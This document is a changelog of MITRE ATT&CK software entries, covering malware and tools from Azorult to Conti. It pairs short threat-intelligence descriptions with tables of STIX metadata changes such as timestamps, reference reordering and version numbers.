| [Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 14:56:50.733000+00:00 | 2022-10-13 17:42:52.174000+00:00 |
| external_references[2]['source_name'] | Unit42 Azorult Nov 2018 | Proofpoint Azorult July 2018 |
| external_references[2]['description'] | Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018. | Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018. |
| external_references[2]['url'] | https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/ | https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside |
| external_references[3]['source_name'] | Proofpoint Azorult July 2018 | Unit42 Azorult Nov 2018 |
| external_references[3]['description'] | Proofpoint. (2018, July 30). New version of AZORult stealer improves loading features, spreads alongside ransomware in new campaign. Retrieved November 29, 2018. | Yan, T., et al. (2018, November 21). New Wine in Old Bottle: New Azorult Variant Found in FindMyName Campaign using Fallout Exploit Kit. Retrieved November 29, 2018. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside | https://researchcenter.paloaltonetworks.com/2018/11/unit42-new-wine-old-bottle-new-azorult-variant-found-findmyname-campaign-using-fallout-exploit-kit/ |
| x_mitre_version | 1.2 | 1.3 |

| Description |
|---|
| [BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 18:09:11.516000+00:00 | 2022-10-13 18:56:28.568000+00:00 |
| x_mitre_version | 1.2 | 1.3 |

| Old Description | New Description |
|---|---|
| [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly) | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 02:49:50.902000+00:00 | 2022-10-12 17:18:25.971000+00:00 |
| description | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a backdoor used by [Dragonfly](https://attack.mitre.org/groups/G0035). It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly) | [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) is a modular backdoor that used by [Dragonfly](https://attack.mitre.org/groups/G0035) against energy companies since at least 2013. [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)(Citation: Symantec Dragonfly Sept 2017) |
| external_references[1]['source_name'] | Symantec Dragonfly | Gigamon Berserk Bear October 2021 |
| external_references[1]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021. |
| external_references[1]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | https://vblocalhost.com/uploads/VB2021-Slowik.pdf |
| x_mitre_version | 1.1 | 2.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'} | |
| external_references | {'source_name': 'Symantec Dragonfly', 'description': 'Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.', 'url': 'https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7382dce7-0260-4782-84cc-890971ed3f17&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments'} | |

| Description |
|---|
| [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 18:43:07.613000+00:00 | 2022-10-12 17:29:57.200000+00:00 |
| external_references[1]['source_name'] | Secure List Bad Rabbit | ESET Bad Rabbit |
| external_references[1]['description'] | Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021. | M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021. |
| external_references[1]['url'] | https://securelist.com/bad-rabbit-ransomware/82851/ | https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ |
| external_references[2]['source_name'] | ESET Bad Rabbit | Secure List Bad Rabbit |
| external_references[2]['description'] | M.Léveille, M-E.. (2017, October 24). Bad Rabbit: Not‑Petya is back with improved ransomware. Retrieved January 28, 2021. | Mamedov, O. Sinitsyn, F. Ivanov, A.. (2017, October 24). Bad Rabbit ransomware. Retrieved January 28, 2021. |
| external_references[2]['url'] | https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/ | https://securelist.com/bad-rabbit-ransomware/82851/ |

| Description |
|---|
| [Bazar](https://attack.mitre.org/software/S0534) is a downloader and backdoor that has been used since at least April 2020, with infections primarily against professional services, healthcare, manufacturing, IT, logistics and travel companies across the US and Europe. [Bazar](https://attack.mitre.org/software/S0534) reportedly has ties to [TrickBot](https://attack.mitre.org/software/S0266) campaigns and can be used to deploy additional malware, including ransomware, and to steal sensitive data.(Citation: Cybereason Bazar July 2020) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-18 19:43:00.355000+00:00 | 2022-09-29 20:41:20.065000+00:00 |
| external_references[1]['source_name'] | KEGTAP | Team9 |
| external_references[1]['description'] | (Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020) | (Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020) |
| external_references[2]['source_name'] | Team9 | KEGTAP |
| external_references[2]['description'] | (Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020) | (Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: CrowdStrike Wizard Spider October 2020) |
| external_references[5]['source_name'] | CrowdStrike Wizard Spider October 2020 | NCC Group Team9 June 2020 |
| external_references[5]['description'] | Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. | Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. |
| external_references[5]['url'] | https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ | https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ |
| external_references[6]['source_name'] | NCC Group Team9 June 2020 | CrowdStrike Wizard Spider October 2020 |
| external_references[6]['description'] | Pantazopoulos, N. (2020, June 2). In-depth analysis of the new Team9 malware family. Retrieved December 1, 2020. | Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021. |
| external_references[6]['url'] | https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/ | https://www.crowdstrike.com/blog/wizard-spider-adversary-update/ |
| x_mitre_version | 1.1 | 1.2 |

| Old Description | New Description |
|---|---|
| [Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018) | [Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:05:26.618000+00:00 | 2022-04-18 17:18:36.512000+00:00 |
| description | [Bisonal](https://attack.mitre.org/software/S0268) is malware that has been used in attacks against targets in Russia, South Korea, and Japan. It has been observed in the wild since 2014.(Citation: Unit 42 Bisonal July 2018) | [Bisonal](https://attack.mitre.org/software/S0268) is a remote access tool (RAT) that has been used by [Tonto Team](https://attack.mitre.org/groups/G0131) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |
| external_references[1]['description'] | (Citation: Unit 42 Bisonal July 2018) | (Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) |
| x_mitre_version | 1.2 | 2.0 |

| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Talos Bisonal Mar 2020', 'description': 'Mercer, W., et al. (2020, March 5). Bisonal: 10 years of play. Retrieved January 26, 2022.', 'url': 'https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html'} | |

| Description |
|---|
| [BlackEnergy](https://attack.mitre.org/software/S0089) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 15:59:03.034000+00:00 | 2022-10-12 17:33:00.482000+00:00 |

| Description |
|---|
| [BloodHound](https://attack.mitre.org/software/S0521) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.(Citation: GitHub Bloodhound)(Citation: CrowdStrike BloodHound April 2018)(Citation: FoxIT Wocao December 2019) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:23:19.517000+00:00 | 2022-09-27 18:19:01.118000+00:00 |
| external_references[1]['source_name'] | GitHub Bloodhound | FoxIT Wocao December 2019 |
| external_references[1]['description'] | Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019. | Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. |
| external_references[1]['url'] | https://github.com/BloodHoundAD/BloodHound | https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf |
| external_references[3]['source_name'] | FoxIT Wocao December 2019 | GitHub Bloodhound |
| external_references[3]['description'] | Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020. | Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019. |
| external_references[3]['url'] | https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf | https://github.com/BloodHoundAD/BloodHound |
| x_mitre_version | 1.1 | 1.3 |

| Description |
|---|
| [BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:33:59.932000+00:00 | 2022-01-18 18:10:37.673000+00:00 |

| Description |
|---|
| [Brave Prince](https://attack.mitre.org/software/S0252) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://attack.mitre.org/software/S0249), and was seen along with [Gold Dragon](https://attack.mitre.org/software/S0249) and [RunningRAT](https://attack.mitre.org/software/S0253) in operations surrounding the 2018 Pyeongchang Winter Olympics. (Citation: McAfee Gold Dragon) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-04-21 23:09:30.781000+00:00 | 2022-04-11 21:44:52.220000+00:00 |
| x_mitre_version | 1.1 | 1.2 |

| Description |
|---|
| [Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:26:31.452000+00:00 | 2022-02-10 15:37:37.795000+00:00 |

| Description |
|---|
| [CHOPSTICK](https://attack.mitre.org/software/S0023) is a malware family of modular backdoors used by [APT28](https://attack.mitre.org/groups/G0007). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) (Citation: DOJ GRU Indictment Jul 2018) It is tracked separately from the [X-Agent for Android](https://attack.mitre.org/software/S0314). |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 15:21:18.086000+00:00 | 2022-04-14 17:21:52.879000+00:00 |
| external_references[1]['source_name'] | CHOPSTICK | SPLM |
| external_references[1]['description'] | (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[2]['source_name'] | Backdoor.SofacyX | Xagent |
| external_references[2]['description'] | (Citation: Symantec APT28 Oct 2018) | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[3]['source_name'] | SPLM | X-Agent |
| external_references[4]['source_name'] | Xagent | webhp |
| external_references[4]['description'] | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: FireEye APT28 January 2017) |
| external_references[5]['source_name'] | X-Agent | CHOPSTICK |
| external_references[5]['description'] | (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) | (Citation: FireEye APT28) (Citation: ESET Sednit Part 2) (Citation: FireEye APT28 January 2017) |
| external_references[6]['source_name'] | webhp | Backdoor.SofacyX |
| external_references[6]['description'] | (Citation: FireEye APT28 January 2017) | (Citation: Symantec APT28 Oct 2018) |
| external_references[7]['source_name'] | FireEye APT28 | ESET Sednit Part 2 |
| external_references[7]['description'] | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. | ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. |
| external_references[7]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf |
| external_references[8]['source_name'] | ESET Sednit Part 2 | FireEye APT28 January 2017 |
| external_references[8]['description'] | ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. |
| external_references[8]['url'] | http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf |
| external_references[9]['source_name'] | FireEye APT28 January 2017 | FireEye APT28 |
| external_references[9]['description'] | FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017. | FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. |
| external_references[9]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf |
| x_mitre_version | 2.1 | 2.2 |

| Description |
|---|
| [CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094).(Citation: Cybereason Kimsuky November 2020) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 13:48:19.728000+00:00 | 2022-10-18 23:14:56.867000+00:00 |

| Description |
|---|
| [China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server. (Citation: Lee 2013) It has been used by several threat groups. (Citation: Dell TG-3390) (Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 14:30:11.979000+00:00 | 2022-04-15 15:15:51.199000+00:00 |
| external_references[2]['source_name'] | Lee 2013 | CISA AA21-200A APT40 July 2021 |
| external_references[2]['description'] | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department. Retrieved August 12, 2021. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html | https://us-cert.cisa.gov/ncas/alerts/aa21-200a |
| external_references[5]['source_name'] | CISA AA21-200A APT40 July 2021 | Lee 2013 |
| external_references[5]['description'] | CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021. | Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015. |
| external_references[5]['url'] | https://us-cert.cisa.gov/ncas/alerts/aa21-200a | https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html |

| Description |
|---|
| [Cobalt Strike](https://attack.mitre.org/software/S0154) is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.(Citation: cobaltstrike manual) In addition to its own capabilities, [Cobalt Strike](https://attack.mitre.org/software/S0154) leverages the capabilities of other well-known tools such as Metasploit and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: cobaltstrike manual) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 20:08:21.958000+00:00 | 2022-10-12 23:24:12.980000+00:00 |
| external_references[1]['url'] | https://cobaltstrike.com/downloads/csmanual38.pdf | https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf |
| x_mitre_version | 1.7 | 1.9 |

| Description |
|---|
| [ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-23 19:34:12.017000+00:00 | 2022-10-18 21:58:12.936000+00:00 |
| external_references[1]['source_name'] | Symantec Waterbug | ESET ComRAT May 2020 |
| external_references[1]['description'] | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. | Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. |
| external_references[1]['url'] | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 | https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf |
| external_references[3]['source_name'] | ESET ComRAT May 2020 | Symantec Waterbug |
| external_references[3]['description'] | Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020. | Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015. |
| external_references[3]['url'] | https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf | https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1 |
| x_mitre_version | 1.2 | 1.3 |

| Description |
|---|
| [Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant) |

| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |

| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 19:41:44.167000+00:00 | 2022-04-25 14:00:00.188000+00:00 |

| Old Description | New Description |
|---|---|
| [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-21 21:05:27.228000+00:00 | 2022-09-29 16:45:13.038000+00:00 |
| description | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service that was first observed in December 2019, and has being distributed via [TrickBot](https://attack.mitre.org/software/S0266). It has been used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) | [Conti](https://attack.mitre.org/software/S0575) is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. [Conti](https://attack.mitre.org/software/S0575) has been deployed via [TrickBot](https://attack.mitre.org/software/S0266) and used against major corporations and government agencies, particularly those in North America. As with other ransomware families, actors using [Conti](https://attack.mitre.org/software/S0575) steal sensitive files and information from compromised networks, and threaten to publish this data unless the ransom is paid.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020) |
| external_references[2]['source_name'] | Cybereason Conti Jan 2021 | CarbonBlack Conti July 2020 |
| external_references[2]['description'] | Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021. | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. |
